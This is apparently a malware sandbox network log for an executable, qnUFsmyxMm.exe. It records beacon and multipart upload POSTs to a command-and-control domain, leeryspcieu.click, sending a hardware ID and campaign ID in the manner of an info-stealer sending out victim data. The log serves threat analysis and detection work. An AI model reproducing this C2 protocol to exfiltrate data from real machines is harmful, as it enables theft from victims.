                                                                                                                                    CF-RAY: 8fb3af6459477c88-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1889&min_rtt=1881&rtt_var=723&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=908&delivery_rate=1496668&cwnd=219&unsent_bytes=0&cid=c2d6971277f3cbf7&ts=507&x=0"
                                                                                                                                    2025-01-01 15:53:57 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                    Data Ascii: 2ok
                                                                                                                                    2025-01-01 15:53:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.549976172.67.219.1334436464C:\Users\user\Desktop\qnUFsmyxMm.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2025-01-01 15:53:58 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 48
                                                                                                                                    Host: leeryspcieu.click
                                                                                                                                    2025-01-01 15:53:58 UTC48OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 76 69 6b 69 2d 31 26 6a 3d
                                                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=c2CoW0--viki-1&j=
                                                                                                                                    2025-01-01 15:53:58 UTC1127INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 01 Jan 2025 15:53:58 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=j0juuteo1pur78cgv2qm9vji8g; expires=Sun, 27 Apr 2025 09:40:37 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6fd6zsXcOLLKEVRVd8VOmjYcwJ%2FA3mjJIAs3Lbk7ZkLxHgp3JQi2XXKEd449PGPRc2T%2BzCjiLY5HIHL6Chlidai943b74P3QcFeggCvRZrl76dAvsdYvRqaNLvTTAmXThNc2Ow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8fb3af6a6bbb42d7-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1543&min_rtt=1534&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=949&delivery_rate=1813664&cwnd=245&unsent_bytes=0&cid=faca40b7c568e45e&ts=496&x=0"
                                                                                                                                    2025-01-01 15:53:58 UTC242INData Raw: 31 63 61 34 0d 0a 62 41 70 72 6d 69 41 6f 6a 65 48 4b 41 50 48 64 6d 67 75 76 72 32 64 4a 52 79 72 6d 67 33 76 39 57 52 45 39 52 68 39 44 32 4b 6f 58 4b 42 32 34 47 68 79 68 77 37 6c 6c 30 2b 66 75 65 64 72 4b 53 32 73 6d 54 73 53 35 48 5a 77 31 59 6c 68 71 50 54 57 31 69 46 5a 73 43 76 5a 54 54 61 48 44 72 33 6a 54 35 38 46 77 6a 63 6f 4a 61 33 30 49 67 2b 6b 5a 6e 44 56 7a 58 43 31 77 4d 37 54 4a 42 47 59 4d 38 6b 56 4c 36 59 43 6d 62 5a 53 34 2f 32 72 46 77 51 34 6b 4c 30 66 45 72 31 6d 59 49 7a 4d 48 5a 46 49 6d 72 4d 73 68 61 78 6a 78 41 6c 57 68 6d 75 68 6c 6e 2f 2b 67 4b 63 37 4b 42 53 55 68 54 6f 33 72 45 35 55 39 63 6c 6b 73 62 79 71 2b 77 67 52 6f 44 2f 4e 50 51 76 32 4e 72 47 71 66 76 76 56 71 6a 59 4e 46
                                                                                                                                    Data Ascii: 1ca4bAprmiAojeHKAPHdmguvr2dJRyrmg3v9WRE9Rh9D2KoXKB24Ghyhw7ll0+fuedrKS2smTsS5HZw1YlhqPTW1iFZsCvZTTaHDr3jT58FwjcoJa30Ig+kZnDVzXC1wM7TJBGYM8kVL6YCmbZS4/2rFwQ4kL0fEr1mYIzMHZFImrMshaxjxAlWhmuhln/+gKc7KBSUhTo3rE5U9clksbyq+wgRoD/NPQv2NrGqfvvVqjYNF
                                                                                                                                    2025-01-01 15:53:58 UTC1369INData Raw: 4c 44 30 49 33 4b 46 4b 72 54 68 69 54 6a 46 77 4d 62 79 49 45 53 59 51 75 45 56 47 72 39 76 6f 61 70 2b 78 2f 57 72 43 79 67 51 72 4e 30 65 45 34 68 47 58 50 33 6c 51 4b 33 49 76 73 4d 38 47 59 51 37 33 52 55 4c 70 6a 4b 73 69 33 66 2f 2f 63 59 32 56 52 51 73 31 53 34 66 31 46 49 35 37 62 42 45 39 50 53 61 32 69 46 59 6f 44 2f 5a 44 52 2b 2b 52 6f 47 6d 59 75 75 70 69 78 4d 41 49 4b 79 68 43 69 2b 49 5a 6d 44 46 35 55 43 35 35 4c 4c 66 4f 44 6d 68 4a 74 67 4a 4e 39 38 50 77 49 72 43 36 36 47 37 42 32 30 63 52 5a 56 66 4b 2b 46 6d 59 4e 7a 4d 48 5a 48 55 6b 75 63 73 46 5a 77 72 77 53 56 6a 76 6b 61 35 76 6c 71 33 2b 62 4d 50 48 42 6a 6b 76 52 6f 4c 69 45 4a 51 79 64 6c 67 67 50 57 2f 36 7a 78 59 6f 55 62 68 6a 52 2b 53 50 6f 6e 57 54 2f 2b 63 6e 31 49 30
                                                                                                                                    Data Ascii: LD0I3KFKrThiTjFwMbyIESYQuEVGr9voap+x/WrCygQrN0eE4hGXP3lQK3IvsM8GYQ73RULpjKsi3f//cY2VRQs1S4f1FI57bBE9PSa2iFYoD/ZDR++RoGmYuupixMAIKyhCi+IZmDF5UC55LLfODmhJtgJN98PwIrC66G7B20cRZVfK+FmYNzMHZHUkucsFZwrwSVjvka5vlq3+bMPHBjkvRoLiEJQydlggPW/6zxYoUbhjR+SPonWT/+cn1I0
                                                                                                                                    2025-01-01 15:53:58 UTC1369INData Raw: 6f 4c 75 46 4a 4e 37 50 52 38 6a 5a 57 48 69 69 43 52 72 48 66 74 49 43 4e 71 41 70 6d 79 55 71 62 68 32 67 39 52 46 4c 43 6b 49 33 4b 45 55 6e 6a 4e 31 54 53 74 77 49 72 54 47 41 57 30 47 38 45 4a 4b 34 6f 61 73 61 5a 69 38 39 57 33 66 78 77 55 6a 49 45 6d 4f 36 31 6e 52 65 33 52 48 5a 43 56 68 69 39 38 46 4b 6a 7a 37 54 45 54 6f 6c 65 68 39 33 61 61 34 62 73 47 4e 58 57 73 6f 51 49 48 6b 46 70 34 78 66 56 6f 75 63 53 6d 30 79 78 78 6e 44 66 68 4f 51 75 57 4f 70 6d 61 62 74 76 4e 69 79 38 30 45 49 57 55 47 78 4f 59 42 33 32 4d 7a 61 79 4e 78 4c 4c 57 4b 4f 32 73 48 39 6b 56 63 72 35 7a 6d 65 39 4f 34 39 43 6d 56 6a 51 6b 69 4a 55 4f 4f 35 52 6d 59 4e 6e 5a 63 49 33 34 73 76 63 49 41 62 77 33 30 53 30 66 70 67 36 39 6d 6c 71 33 39 59 4d 48 42 52 57 56 6c
                                                                                                                                    Data Ascii: oLuFJN7PR8jZWHiiCRrHftICNqApmyUqbh2g9RFLCkI3KEUnjN1TStwIrTGAW0G8EJK4oasaZi89W3fxwUjIEmO61nRe3RHZCVhi98FKjz7TEToleh93aa4bsGNXWsoQIHkFp4xfVoucSm0yxxnDfhOQuWOpmabtvNiy80EIWUGxOYB32MzayNxLLWKO2sH9kVcr5zme9O49CmVjQkiJUOO5RmYNnZcI34svcIAbw30S0fpg69mlq39YMHBRWVl
                                                                                                                                    2025-01-01 15:53:58 UTC1369INData Raw: 65 47 65 33 52 54 5a 43 56 68 73 38 45 63 5a 67 66 78 54 30 7a 6e 68 4b 5a 76 6d 4c 6e 7a 62 73 72 4c 43 43 4d 6f 54 59 66 67 48 5a 55 70 63 46 51 75 63 43 76 36 68 6b 35 76 45 62 67 61 43 73 69 50 67 58 4b 49 72 65 34 70 30 6f 4d 63 61 79 4a 45 78 4c 6c 5a 6e 44 52 36 55 43 78 31 4c 72 58 4d 41 47 34 50 39 55 64 46 35 5a 47 67 62 4a 36 30 39 32 4c 66 7a 51 67 76 4b 55 79 4d 36 68 50 66 64 54 4e 59 50 44 31 35 2b 76 30 44 5a 77 6e 37 56 41 72 77 7a 62 45 69 6c 4c 4f 34 4d 59 33 42 43 79 73 71 52 49 6a 71 45 5a 34 33 66 56 67 68 64 43 6d 79 32 67 39 73 41 66 6c 4d 52 65 36 48 72 57 65 58 75 50 78 76 77 6f 31 4c 61 79 4a 51 78 4c 6c 5a 73 42 78 47 48 51 56 48 59 61 57 47 46 79 67 4f 39 41 49 53 72 34 2b 72 62 70 75 77 2f 6d 44 42 78 77 77 67 4b 55 4f 41 37
                                                                                                                                    Data Ascii: eGe3RTZCVhs8EcZgfxT0znhKZvmLnzbsrLCCMoTYfgHZUpcFQucCv6hk5vEbgaCsiPgXKIre4p0oMcayJExLlZnDR6UCx1LrXMAG4P9UdF5ZGgbJ6092LfzQgvKUyM6hPfdTNYPD15+v0DZwn7VArwzbEilLO4MY3BCysqRIjqEZ43fVghdCmy2g9sAflMRe6HrWeXuPxvwo1LayJQxLlZsBxGHQVHYaWGFygO9AISr4+rbpuw/mDBxwwgKUOA7
                                                                                                                                    2025-01-01 15:53:58 UTC1369INData Raw: 38 58 69 56 37 4d 37 33 42 48 47 59 45 39 30 70 43 35 6f 4b 73 5a 35 36 35 39 47 50 4d 79 67 73 6c 4c 51 6a 4b 6f 52 36 48 65 79 73 66 42 57 30 36 71 4e 34 44 53 51 54 33 41 6c 57 68 6d 75 68 6c 6e 2f 2b 67 4b 63 54 66 41 53 59 33 51 59 50 76 46 70 77 70 63 6c 49 76 62 79 61 31 7a 41 6c 6b 44 2f 64 45 53 2b 71 4a 70 47 57 57 74 50 64 6c 6a 59 4e 46 4c 44 30 49 33 4b 45 33 6c 43 68 6b 58 43 70 32 4e 36 47 49 45 53 59 51 75 45 56 47 72 39 76 6f 59 5a 69 30 2f 47 6e 42 7a 51 45 6d 4a 56 71 4c 35 68 36 57 4d 47 46 56 49 33 6f 71 73 73 4d 42 62 68 76 30 54 46 6a 71 6b 62 6f 69 33 66 2f 2f 63 59 32 56 52 52 30 69 57 4a 54 69 57 36 34 74 63 45 6b 76 63 43 33 36 31 30 42 78 53 66 39 4f 43 72 66 44 72 6d 32 61 76 50 64 6f 78 4d 45 49 4c 69 78 4e 68 65 63 64 6c 54
                                                                                                                                    Data Ascii: 8XiV7M73BHGYE90pC5oKsZ5659GPMygslLQjKoR6HeysfBW06qN4DSQT3AlWhmuhln/+gKcTfASY3QYPvFpwpclIvbya1zAlkD/dES+qJpGWWtPdljYNFLD0I3KE3lChkXCp2N6GIESYQuEVGr9voYZi0/GnBzQEmJVqL5h6WMGFVI3oqssMBbhv0TFjqkboi3f//cY2VRR0iWJTiW64tcEkvcC3610BxSf9OCrfDrm2avPdoxMEILixNhecdlT
                                                                                                                                    2025-01-01 15:53:58 UTC1369INData Raw: 50 54 37 30 30 55 35 76 42 62 67 61 43 75 79 45 71 32 4f 5a 74 76 52 6d 79 73 6b 58 49 53 4a 61 68 65 41 53 6b 6a 64 7a 55 69 6c 33 49 4c 50 46 41 6d 55 4f 2f 30 31 50 72 38 33 6f 5a 59 76 2f 6f 43 6e 73 77 41 34 6e 66 68 4c 45 2f 6c 65 47 65 33 52 54 5a 43 56 68 75 73 49 4c 59 67 54 37 54 55 6e 39 67 71 35 77 6b 37 4c 79 65 38 66 47 41 43 59 6f 52 59 66 6e 48 35 51 33 59 56 59 6b 66 69 72 36 68 6b 35 76 45 62 67 61 43 73 79 55 76 6d 69 55 73 2b 35 69 7a 4d 34 54 4a 6a 55 49 79 71 45 49 6d 43 6f 7a 42 7a 4a 74 4e 72 33 58 51 48 46 4a 2f 30 34 4b 74 38 4f 75 61 35 57 34 2f 6d 66 66 79 41 4d 6b 4b 6b 47 4e 35 52 47 63 4f 33 64 62 49 33 67 69 74 73 4d 4a 61 77 62 38 53 30 54 6d 6a 4f 67 73 30 37 6a 67 4b 5a 57 4e 4a 44 41 6d 52 49 6d 68 42 74 45 69 4d 31 67
                                                                                                                                    Data Ascii: PT700U5vBbgaCuyEq2OZtvRmyskXISJaheASkjdzUil3ILPFAmUO/01Pr83oZYv/oCnswA4nfhLE/leGe3RTZCVhusILYgT7TUn9gq5wk7Lye8fGACYoRYfnH5Q3YVYkfir6hk5vEbgaCsyUvmiUs+5izM4TJjUIyqEImCozBzJtNr3XQHFJ/04Kt8Oua5W4/mffyAMkKkGN5RGcO3dbI3gitsMJawb8S0TmjOgs07jgKZWNJDAmRImhBtEiM1g
                                                                                                                                    2025-01-01 15:53:58 UTC253INData Raw: 6f 68 57 4b 43 6e 7a 56 45 2f 6f 6c 65 70 58 6b 4c 48 32 62 74 75 4e 47 68 52 72 43 49 76 37 57 63 63 43 61 68 38 6a 63 57 48 69 69 42 74 76 43 66 39 59 58 4f 69 50 75 57 6d 65 73 39 70 6d 79 74 73 47 4a 43 5a 5a 6a 61 30 53 6b 6e 73 39 48 79 4e 6c 59 65 4b 49 49 57 38 66 2b 32 31 4a 2f 6f 72 6f 4c 4e 4f 34 37 69 6d 56 6a 54 74 72 4e 30 75 55 34 68 61 4f 42 54 4d 48 50 55 4e 68 73 64 34 4a 65 41 72 75 53 55 66 6a 6b 70 59 69 79 2b 75 71 4f 35 2b 66 56 7a 52 6c 56 37 75 76 57 5a 35 37 4b 32 59 39 50 54 66 36 6b 46 77 6d 53 65 6f 43 45 71 2f 45 71 33 43 42 75 66 74 2f 7a 6f 6f 37 46 51 4a 65 6a 75 59 4a 6d 43 78 38 48 32 6f 39 4c 76 71 51 4e 79 67 41 2f 31 6c 62 2b 59 36 34 5a 64 4f 41 74 69 6e 56 6a 56 31 72 45 45 75 4b 37 78 36 4a 4b 6a 35 34 0d 0a
                                                                                                                                    Data Ascii: ohWKCnzVE/olepXkLH2btuNGhRrCIv7WccCah8jcWHiiBtvCf9YXOiPuWmes9pmytsGJCZZja0Skns9HyNlYeKIIW8f+21J/oroLNO47imVjTtrN0uU4haOBTMHPUNhsd4JeAruSUfjkpYiy+uqO5+fVzRlV7uvWZ57K2Y9PTf6kFwmSeoCEq/Eq3CBuft/zoo7FQJejuYJmCx8H2o9LvqQNygA/1lb+Y64ZdOAtinVjV1rEEuK7x6JKj54
                                                                                                                                    2025-01-01 15:53:58 UTC1369INData Raw: 32 63 66 30 0d 0a 4d 6e 63 6d 71 73 38 5a 5a 30 6d 32 41 6b 79 76 32 2f 73 73 30 37 76 70 4b 5a 57 64 56 33 42 77 47 39 4f 78 53 34 42 31 61 68 38 79 50 58 6e 6f 68 6b 35 36 53 61 41 43 44 65 79 52 75 6d 53 51 71 66 73 75 38 2f 4d 69 4d 53 68 4f 6b 2f 41 6e 6f 54 78 70 55 69 4a 71 4d 50 62 64 44 57 59 48 2f 31 51 4b 6f 63 4f 6e 49 73 75 47 75 43 47 4e 38 6b 74 72 50 51 6a 63 6f 53 79 63 4e 58 31 59 4d 6d 78 73 6e 64 49 44 62 68 37 70 41 67 53 76 68 65 67 36 77 66 47 34 62 64 79 4e 58 58 74 33 45 39 47 79 54 73 39 70 62 42 45 39 50 54 66 36 6b 46 77 6d 53 65 6f 43 45 71 2f 45 71 33 43 42 75 66 74 2f 7a 6f 6f 37 46 51 74 50 67 75 51 65 6a 33 6c 64 56 44 42 36 59 66 53 49 41 53 68 52 77 51 49 43 72 37 7a 6d 49 6f 76 2f 6f 43 6e 34 7a 67 73 6c 49 6c 36 56 72
                                                                                                                                    Data Ascii: 2cf0Mncmqs8ZZ0m2Akyv2/ss07vpKZWdV3BwG9OxS4B1ah8yPXnohk56SaACDeyRumSQqfsu8/MiMShOk/AnoTxpUiJqMPbdDWYH/1QKocOnIsuGuCGN8ktrPQjcoSycNX1YMmxsndIDbh7pAgSvheg6wfG4bdyNXXt3E9GyTs9pbBE9PTf6kFwmSeoCEq/Eq3CBuft/zoo7FQtPguQej3ldVDB6YfSIAShRwQICr7zmIov/oCn4zgslIl6Vr
                                                                                                                                    2025-01-01 15:53:58 UTC1369INData Raw: 7a 42 33 59 7a 59 61 69 49 56 69 68 4f 2b 31 42 59 36 59 43 2b 59 64 53 42 78 6b 37 44 79 67 51 39 4e 56 2b 4c 33 79 65 4b 4f 48 31 52 49 32 73 77 2b 6f 5a 4f 5a 30 6d 67 65 77 71 6e 77 35 63 73 30 36 65 34 4d 59 33 34 42 69 55 72 54 35 4c 77 56 4c 67 31 64 46 34 79 62 54 61 31 69 45 41 6f 44 37 67 61 47 4b 48 44 72 48 50 54 35 36 67 37 6c 70 68 57 66 48 55 61 6d 36 38 41 33 79 30 7a 42 33 59 7a 59 61 69 49 56 69 68 4f 2b 31 42 59 36 59 43 2b 59 64 53 42 78 6b 37 44 79 67 51 39 4e 56 2b 4c 72 6a 65 70 47 6b 31 68 4d 58 34 76 74 4d 38 59 65 55 6d 32 41 6b 57 76 32 35 45 69 32 2f 2f 48 4a 34 33 56 52 58 4e 6c 66 59 66 76 46 35 67 74 59 68 49 44 63 79 61 37 33 68 35 2f 42 72 64 73 66 4d 37 44 35 69 4b 56 2f 36 41 37 67 34 30 42 4f 6d 55 51 31 4c 4e 43 79 6d
                                                                                                                                    Data Ascii: zB3YzYaiIVihO+1BY6YC+YdSBxk7DygQ9NV+L3yeKOH1RI2sw+oZOZ0mgewqnw5cs06e4MY34BiUrT5LwVLg1dF4ybTa1iEAoD7gaGKHDrHPT56g7lphWfHUam68A3y0zB3YzYaiIVihO+1BY6YC+YdSBxk7DygQ9NV+LrjepGk1hMX4vtM8YeUm2AkWv25Ei2//HJ43VRXNlfYfvF5gtYhIDcya73h5/BrdsfM7D5iKV/6A7g40BOmUQ1LNCym


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    2192.168.2.549977172.67.219.1334436464C:\Users\user\Desktop\qnUFsmyxMm.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2025-01-01 15:53:59 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: multipart/form-data; boundary=TXBL6FP7
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 12776
                                                                                                                                    Host: leeryspcieu.click
                                                                                                                                    2025-01-01 15:53:59 UTC12776OUTData Raw: 2d 2d 54 58 42 4c 36 46 50 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 37 31 30 33 30 46 39 35 32 36 36 30 32 44 30 45 45 31 38 39 43 43 44 34 44 36 44 39 32 41 0d 0a 2d 2d 54 58 42 4c 36 46 50 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 58 42 4c 36 46 50 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 76 69 6b 69 2d 31 0d 0a 2d 2d 54 58 42 4c 36 46 50 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
                                                                                                                                    Data Ascii: --TXBL6FP7Content-Disposition: form-data; name="hwid"F771030F9526602D0EE189CCD4D6D92A--TXBL6FP7Content-Disposition: form-data; name="pid"2--TXBL6FP7Content-Disposition: form-data; name="lid"c2CoW0--viki-1--TXBL6FP7Content-Disposi
                                                                                                                                    2025-01-01 15:54:00 UTC1131INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 01 Jan 2025 15:54:00 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=3n53rrm52ural880i294381v79; expires=Sun, 27 Apr 2025 09:40:38 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jNh24WacE360uIUuYt0mHgwVtBWfwXNFoIAaoCZFQ2HfUusYF9mn4yCTB9nm%2BKptz730fXv1vXk2hGFmPEKyWocRTDd%2BGAH0nQZkzlgzGuE6WW3ObySqbTmSNeN0gW52ePzKyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8fb3af721e35f793-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1478&rtt_var=569&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13707&delivery_rate=1899804&cwnd=152&unsent_bytes=0&cid=2ce26a9f20619f46&ts=1042&x=0"
                                                                                                                                    2025-01-01 15:54:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                    2025-01-01 15:54:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    3192.168.2.549978172.67.219.1334436464C:\Users\user\Desktop\qnUFsmyxMm.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2025-01-01 15:54:00 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: multipart/form-data; boundary=RKU1FFS6PEEW
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 15042
                                                                                                                                    Host: leeryspcieu.click
                                                                                                                                    2025-01-01 15:54:00 UTC15042OUTData Raw: 2d 2d 52 4b 55 31 46 46 53 36 50 45 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 37 31 30 33 30 46 39 35 32 36 36 30 32 44 30 45 45 31 38 39 43 43 44 34 44 36 44 39 32 41 0d 0a 2d 2d 52 4b 55 31 46 46 53 36 50 45 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 4b 55 31 46 46 53 36 50 45 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 76 69 6b 69 2d 31 0d 0a 2d 2d 52 4b 55 31 46 46 53 36 50 45 45 57 0d
                                                                                                                                    Data Ascii: --RKU1FFS6PEEWContent-Disposition: form-data; name="hwid"F771030F9526602D0EE189CCD4D6D92A--RKU1FFS6PEEWContent-Disposition: form-data; name="pid"2--RKU1FFS6PEEWContent-Disposition: form-data; name="lid"c2CoW0--viki-1--RKU1FFS6PEEW
                                                                                                                                    2025-01-01 15:54:01 UTC1144INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 01 Jan 2025 15:54:01 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Set-Cookie: PHPSESSID=2h3ln64lna2e9egp7582braati; expires=Sun, 27 Apr 2025 09:40:40 GMT; Max-Age=9999999; path=/
                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                    Pragma: no-cache
                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    vary: accept-encoding
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zxxQTFSeLIrF%2Bez7Bl%2B290dOTIxy6PFXFzvHJ4WT%2B%2BjKsr%2FQiJC3%2BG0lxA4v1kfns%2BoLWYweshTDzkiYEhuf7bZ%2BKLdtBMLdJZ7VWQIKlVL0NQH%2FhNWa8ZQLWZh4bJIs50z9JA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8fb3af7c9bac5e82-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1575&rtt_var=593&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2844&recv_bytes=15977&delivery_rate=1839949&cwnd=216&unsent_bytes=0&cid=458ff4d6fed2141b&ts=706&x=0"
                                                                                                                                    2025-01-01 15:54:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                    2025-01-01 15:54:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    4192.168.2.549979172.67.219.1334436464C:\Users\user\Desktop\qnUFsmyxMm.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2025-01-01 15:54:02 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Content-Type: multipart/form-data; boundary=0ADCPECMN
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Content-Length: 20514
                                                                                                                                    Host: leeryspcieu.click
                                                                                                                                    2025-01-01 15:54:02 UTC15331OUTData Raw: 2d 2d 30 41 44 43 50 45 43 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 37 31 30 33 30 46 39 35 32 36 36 30 32 44 30 45 45 31 38 39 43 43 44 34 44 36 44 39 32 41 0d 0a 2d 2d 30 41 44 43 50 45 43 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 41 44 43 50 45 43 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 76 69 6b 69 2d 31 0d 0a 2d 2d 30 41 44 43 50 45 43 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
